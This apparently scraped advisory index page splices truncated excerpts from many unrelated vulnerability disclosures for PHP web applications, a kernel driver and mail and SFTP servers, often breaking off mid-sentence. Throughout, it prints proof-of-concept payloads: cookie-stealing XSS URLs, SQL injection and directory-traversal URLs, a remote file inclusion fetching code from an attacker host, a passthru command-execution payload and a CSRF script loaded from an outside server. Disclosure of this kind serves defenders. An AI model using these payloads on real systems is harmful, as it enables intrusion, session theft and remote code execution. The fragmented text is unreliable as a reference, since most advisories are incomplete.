Next Page >>
passing
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.ch/advisory/ )
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in SiT! Support Incident Tracker, which can be exploited to perform SQL injection, cross-site scripting, cross-site request forgery attacks.
1) Input passed via the "start" GET parameter to /portal/kb.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
http://[host]/portal/kb.php?start=SQL_CODE_HERE
Multiple vulnerabilities have been discovered in OpenX, which can be
exploited by malicious people to conduct cross-site scripting,
cross-site request forgery, and file inclusion attacks and by
malicious users to conduct script insertion and SQL injection attacks.
1) Input passed to the "clientid" parameter in "www/admin/banner-
acl.php", "www/admin/banner-edit.php", "www/admin/campaign-zone.php",
"www/admin/advertiser-campaigns.php", "www/admin/campaign-
banners.php", and "www/admin/banner-activate.php" is not properly
sanitised before being returned to the user. This can be exploited to
execute arbitrary HTML and script code in a user's browser session in
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in osCmax, which can be exploited to perform SQL Injection and Cross-Site Scripting (XSS) attacks.
1) Multiple Cross-Site Scripting (XSS) in osCmax: CVE-2012-1664
1.1 Input passed via the "username" POST parameter to /admin/login.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in user's browser session in context of affected website.
The following PoC (Proof of Concept) demonstrates the vulnerability:
which can be exploited by malicious users to manipulate certain data,
conduct spoofing, SQL injection, and script insertion attacks and by
malicious people to conduct SQL injection and script insertion
attacks.
1) Input passed via the "login" parameter to index.php is not properly
sanitised before being used in an SQL query. This can be exploited to
manipulate SQL queries by injecting arbitrary SQL code.
2) Input passed via the "login" and "password" parameters to index.php
is not properly sanitised before being displayed to the user. This can
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.ch/advisory/ )
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in OBM, which can be exploited to perform information disclosure, cross-site scripting, local file inclusion and SQL injection attacks.
1) Input passed via the "module" GET parameter to /exportcsv/exportcsv_index.php is not properly verified before being used to include files.
This can be exploited to include local files via directory traversal sequences.
The following PoC is available:
http://[host]/exportcsv/exportcsv_index.php?action=export_page&module=../../../../tmp/file
15. $templateContent = $_POST['templateContent'];
16. if(file_exists($filename) === false) {
17. $ok = file_put_contents($filename, $templateContent);
18. chmod($filename, 0644);
Input passed through $_POST['templateName'] and $_POST['templateContent'] isn't sanitized before being
used in a call to file_put_contents() at line 17, this can be exploited to write arbitrary PHP code in
a file with .php extension also if magic_quotes_gpc = on. Proof of concept request:
POST /efront/www/editor/tiny_mce/plugins/save_template/save_template.php HTTP/1.1
Host: localhost
---------------
SUPERAntiSpyware and Super Ad Blocker have almost identical device
drivers in order to set up hooks and perform other duties from kernel
space. These device drivers suffer from lack of validation of
parameters passed from user mode. Additionally, some of the functions
accessible from user mode are inherently insecure and lead to easy
privilege escalation. All vulnerabilities are applicable to both
applications.
Analysis and code was developed for SUPERAntiSpyware v4.33.1000, but
http://[host]/phpshop/admpanel/menu/adm_menu_new.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/gbook/?a=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Successful exploitation of this vulnerabilities requires that Apache's directive "AcceptPathInfo" is set to "on" or "default" (default value is "default")
2) Input passed via the "pid" GET parameter to /phpshop/admpanel/catalog/admin_cat_content.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
http://[host]/phpshop/admpanel/catalog/admin_cat_content.php?pid=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.ch/advisory/ )
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Efront, which can be exploited to perform sql injection and cross-site scripting attacks.
1) Input passed via the "course" GET parameter to index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
http://[host]/index.php?ctg=lesson_info&lessons_ID=1&course=%27%20onmouseover%3dalert%28document.cookie%29%3E
470 | # Then overwrite with POST
471 | self::$request = IPSLib::parseIncomingRecursively( $_POST,
$input );
... |
The init() function cleans the input data passed via methods like GET,
POST or
others at the start of each request to the forum before any of the input
variables are processed.
Let's look into sanitization performed by cleanGlobals function:
Title: Invision Power Board <= 2.3.5
Multiple Vulnerabilities and Security Bypass
Vendor: http://www.invisionpower.com/community/board/
Advisory: http://acid-root.new.fr/?0:18
Author: DarkFig < gmdarkfig (at) gmail (dot) com >
Released on: 2008/08/29
Changelog: 2008/08/29
iPrint Client, which can be exploited by malicious people to
compromise a user's system.
1) A boundary error in the Novell iPrint ActiveX control (ienipp.ocx)
when handling the "GetDriverFile()" method can be exploited to cause a
stack-based buffer overflow by passing an overly long string as the
third argument.
2) Two boundary errors in the Novell iPrint ActiveX control
(ienipp.ocx) when constructing a URI based on input to the
"GetPrinterURLList()" and "GetPrinterURLList2()" methods can be
...
'forum' variable is taken from $_POST[] array and inserted in a sql query without
prior santization and without being surrounded by quotes.
Then you can subsequently manipulate this query in /modules/forum/class/class.permissions.php by passing
another 'UNION SELECT' as first argument of the 'UNION SELECT' passed to post.php
(a little bit complex uh? $forum_id is user controlled ...)
100-102:
...
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Newscoop, which can be exploited to perform Remote File Inclusion, SQL Injection and Cross-Site Scripting (XSS) attacks.
1) Multiple Remote File Inclusion in Newscoop: CVE-2012-1933
1.1 Input passed via the "GLOBALS[g_campsiteDir]" GET parameter to /include/phorum_load.php is not properly verified before being used in require_once() function and can be exploited to include arbitrary remote files.
The following PoC (Proof of Concept) demonstrates the vulnerability:
http://[host]/include/phorum_load.php?GLOBALS[g_campsiteDir]=http://attacker.site/file%00
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ )
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Open-Realty, which can be exploited to perform cross-site scripting and SQL Injection attacks.
1) Input passed via the "name", "email", "friend_email", "subject", "message" POST parameters to index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
http://[host]/modules/admin/admin_module_index.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/modules/calendar/customise_calendar_times.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Successful exploitation of this vulnerabilities requires that Apache's directive "AcceptPathInfo" is set to "on" or "default" (default value is "default")
2) Input passed via the "login[]" POST parameters to index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
Conditions for exploitation:
=> PHP needs to be used via CGI or FastCGI.
=> The system must be set up to use suexec (rather than, say, having PHP run as an external FastCGI server).
=> The attacker must be able to run code as the same user that the webserver runs as. This is unlikely to be a problem for many local attackers, because there are a multitude of possible attack vectors, such as SSI, non-suexec CGI scripts, non-suexec PHP (if mod_php is also installed), and likely numerous other options.
=> Depending on the configuration, setting an open_basedir might protect an installation. However, this only applies if open_basedir is set, php-cgi is not installed directly into the web space, but is instead called from a script which doesn't pass any parameters from the script command line.
Affected PHP versions:
=> All versions of PHP (including PHP 5.2.8 and latest CVS) in existence at the date of this advisory are believed to be affected.
Vendor notification:
* This program is meant to be used in controlled environments only.
* If found in the wild, please return to ... wait, this is public now,
* and this program is hereby placed in the public domain. Feel free to
* reuse parts of the source code, etc.
*
* Password hashes will be dumped to stdout as they're being obtained.
* There may be duplicates.
*
* Debugging may be enabled with one to three "-d" flags. Debugging
* information will be dumped to stderr and, for levels 2 and 3, to
* the "dump" file.
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.ch/advisory/ )
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Help Desk Software, which can be exploited to perform SQL injection, cross-site scripting and cross-site request forgery attacks.
1) Input passed via the user POST parameter to index.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
If you could log on the server successfully,
take the following steps to create folders outside the sftp root directory:
1. $ssh2 = Net::SSH2->new();
2. $ssh2->connect($server, $port);
3. $ssh2->auth_password($user, $pass);
4. $sftp = $ssh2->sftp();
5. $m = $sftp->mkdir("..\\A\\");
6. $ssh2->disconnect();
take the following steps to create folders outside the ftp root directory:
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ )
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in N-13 News, which can be exploited to perform cross-site scripting attacks.
1) Input passed via the GET "id" parameter to index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
http://[host]/index.php?id=%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
$display .= COM_refresh ($_CONF['site_url']
. '/usersettings.php?mode=preferences&msg=6');
break;
...
all the $_POST[] variables are passed to the savepreferences() function
now look the function always in usersettings.php:
...
function savepreferences($A) {
global $_CONF, $_TABLES, $_USER;
site: http://retrogod.altervista.org/
software site: http://www.bitweaver.org/
You need an user account and you need to change your "display name" in:
{php}passthru($_SERVER[HTTP_CMD]);{/php}
Register and click on Preferences, look at the "User Information" tab, inside the
"Real name" text field write the code above, then click on Change.
Google dorks:
The 'PathName' parameter is converted from a multi byte string to a wide
character string after verifying that it doesn't contain the dot-dot
substring (the two-byte sequence '0x2e0x2e' that translates to the ASCII
substring '".."') that may allow a malicious user to break out of the
shared folder using a path traversal attack. The resulting wide character
string converted from 'PathName' is then passed to the file system API on
the Host system.
The conversion is performed using the 'MultiByteToWideChar' function from
the Windows API [5] which maps a character string provided as input to a
wide (Unicode UTF-16) character string.
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.ch/advisory/ )
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Pretty Link WordPress Plugin, which can be exploited to perform cross-site scripting attacks.
1) Input passed via the "min_date" GET parameter to /wp-content/plugins/pretty-link/classes/views/prli-clicks/head.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
http://[host]/wp-content/plugins/pretty-link/classes/views/prli-clicks/head.php?min_date=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ )
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in miniblog, which can be exploited to perform cross-site scripting & cross-site request forgery attacks.
1) Input passed via the GET "post_list" parameter to /adm/list.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
http://[host]/adm/list.php?post_list=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
#
# AmnPardaz Security Research Team
#
# Title:Bloofox CMS Vulnerabilities
# Vendor: http://www.bloofox.com
# Bugs: SQL Injection (Authentication bypass) , Source code disclosure
# Vulnerable Version: 0.3 (prior versions also may be affected)
# Exploitation: Remote with browser
# Fix Available: No!
################################################################
Secunia Research has discovered multiple vulnerabilities in the
BookLibrary component for Joomla, which can be exploited by malicious
people to conduct SQL injection attacks.
1) Input passed via the "bid[]" parameter to index.php (when "option"
is set to "com_booklibrary" and "task" is set to "lend_request") is
not properly sanitised before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.
2) Input passed via the "bid[]" parameter to index.php (when "option"
src=http://somewhere/test.js></script>
content of http://somewhere/test.js
/*
Set desiered user, pass, email and victims url then upload the script
somewhere on the web
*/
window.onload = function() {
var url = 'http://localhost/MamboV4.6.2/administrator/index2.php';
on a fresh test install of Plesk 8.6.0 both on OpenSUSE 10.3 x86_64 and
using psa autoinstaller.
(1) If SHORTNAMES=1 is active for smtp_psa or smtps_psa in xinetd, QMAIL
will accept ANY correctly base64 encoded username which begins with a
valid shortname or equals a valid password during AUTH LOGIN
authentication. This is only fixed by completely removing SHORTNAMES=1
from smtp(s)_psa, simply setting it to 0 has no effect.
Steps to reproduce:
Next Page>>
|
